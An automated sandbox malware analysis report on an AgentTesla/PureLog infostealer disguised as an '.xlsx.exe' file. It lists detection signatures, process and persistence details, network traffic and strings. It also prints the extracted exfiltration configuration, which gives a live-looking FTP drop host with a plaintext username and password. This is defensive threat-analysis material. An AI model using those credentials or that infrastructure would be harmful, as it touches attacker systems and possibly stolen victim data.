Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BL NBNSA240600050.xlsx.exe

Overview

General Information

Sample name:BL NBNSA240600050.xlsx.exe
Analysis ID:1479357
MD5:7dc8ba9345de935c7b90ea6c61f3464f
SHA1:78786835c8b7b91c0223e970a45b50176eb96b33
SHA256:fca147ee2f07c81f599b17e6957d45b40dd29518e9ff97bb90b742ea1c27bcea
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Drops executable to a common third party application directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • BL NBNSA240600050.xlsx.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)
    • BL NBNSA240600050.xlsx.exe (PID: 2912 cmdline: "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)
  • adobe.exe (PID: 3312 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)
    • adobe.exe (PID: 5852 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)
  • adobe.exe (PID: 7428 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)
    • adobe.exe (PID: 7500 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: 7DC8BA9345DE935C7B90EA6C61F3464F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 23 entries
              SourceRuleDescriptionAuthorStrings
              0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.BL NBNSA240600050.xlsx.exe.8110000.9.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    3.2.adobe.exe.2a7f0b8.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      3.2.adobe.exe.2a7f0b8.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 17 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe", CommandLine: "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe, NewProcessName: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe", ProcessId: 7064, ProcessName: BL NBNSA240600050.xlsx.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe, ProcessId: 2912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe
                        No Snort rule has matched
                        Timestamp:2024-07-23T15:05:21.347468+0200
                        SID:2855542
                        Source Port:49748
                        Destination Port:63434
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-23T15:05:21.331691+0200
                        SID:2855542
                        Source Port:49748
                        Destination Port:63434
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-23T15:04:59.113823+0200
                        SID:2029927
                        Source Port:49734
                        Destination Port:21
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-23T15:05:20.765442+0200
                        SID:2029927
                        Source Port:49747
                        Destination Port:21
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-23T15:04:59.688534+0200
                        SID:2855542
                        Source Port:49736
                        Destination Port:63043
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-23T15:04:59.682766+0200
                        SID:2855542
                        Source Port:49736
                        Destination Port:63043
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeReversingLabs: Detection: 73%
                        Source: BL NBNSA240600050.xlsx.exeReversingLabs: Detection: 73%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJoe Sandbox ML: detected
                        Source: BL NBNSA240600050.xlsx.exeJoe Sandbox ML: detected
                        Source: BL NBNSA240600050.xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49746 version: TLS 1.2
                        Source: BL NBNSA240600050.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: thQh.pdb source: BL NBNSA240600050.xlsx.exe, adobe.exe.2.dr
                        Source: Binary string: thQh.pdbSHA256 source: BL NBNSA240600050.xlsx.exe, adobe.exe.2.dr
                        Source: global trafficTCP traffic: 192.168.2.4:49736 -> 213.189.52.181:63043
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                        Source: Joe Sandbox ViewASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownFTP traffic detected: 213.189.52.181:21 -> 192.168.2.4:49734 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: s4.serv00.com
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002776000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s4.serv00.com
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.1893877251.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: BL NBNSA240600050.xlsx.exe, adobe.exe.2.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1674328438.0000000007852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: BL NBNSA240600050.xlsx.exe, 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                        Source: adobe.exe, 00000004.00000002.4117501266.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.4116040760.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49746 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, JovGVW.cs.Net Code: _5PXjwm
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, JovGVW.cs.Net Code: _5PXjwm
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exe
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWindow created: window name: CLIPBRDWNDCLASS

                        System Summary

                        barindex
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_083833500_2_08383350
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_083837880_2_08383788
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_083827F00_2_083827F0
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_08383BC00_2_08383BC0
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_030DDFAC0_2_030DDFAC
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_07E430F80_2_07E430F8
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_07E42E870_2_07E42E87
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_07E42E980_2_07E42E98
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_07E4B5180_2_07E4B518
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_07E430E70_2_07E430E7
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_00D0B3972_2_00D0B397
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_00D04A902_2_00D04A90
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_00D03E782_2_00D03E78
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_00D041C02_2_00D041C0
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_06371BB72_2_06371BB7
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063728A82_2_063728A8
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_0637289A2_2_0637289A
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063735922_2_06373592
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063D30182_2_063D3018
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063DC0F82_2_063DC0F8
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063D61602_2_063D6160
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063D51502_2_063D5150
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063DCEC82_2_063DCEC8
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063DAD902_2_063DAD90
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063D78F82_2_063D78F8
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063D72182_2_063D7218
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063DE3282_2_063DE328
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063D23402_2_063D2340
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063D00402_2_063D0040
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063D584F2_2_063D584F
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063DC9902_2_063DC990
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_063D00062_2_063D0006
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_011CDFAC3_2_011CDFAC
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_070B9F303_2_070B9F30
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_070B37883_2_070B3788
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_070B27F03_2_070B27F0
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_070B5CA03_2_070B5CA0
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_070B33423_2_070B3342
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_070B33503_2_070B3350
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_070B53C83_2_070B53C8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_070B3BC03_2_070B3BC0
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_08AA30F83_2_08AA30F8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_08AA30EF3_2_08AA30EF
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_08AAB4E03_2_08AAB4E0
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_08AAB5083_2_08AAB508
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_08AAB5183_2_08AAB518
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_08AA2E8F3_2_08AA2E8F
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_08AA2E983_2_08AA2E98
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_016CE8A84_2_016CE8A8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_016C4A904_2_016C4A90
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_016CADA84_2_016CADA8
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_016C3E784_2_016C3E78
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_016C41C04_2_016C41C0
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DE079C4_2_06DE079C
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DE20084_2_06DE2008
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DE20034_2_06DE2003
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DE2CFE4_2_06DE2CFE
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DF27504_2_06DF2750
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_06DF55504_2_06DF5550
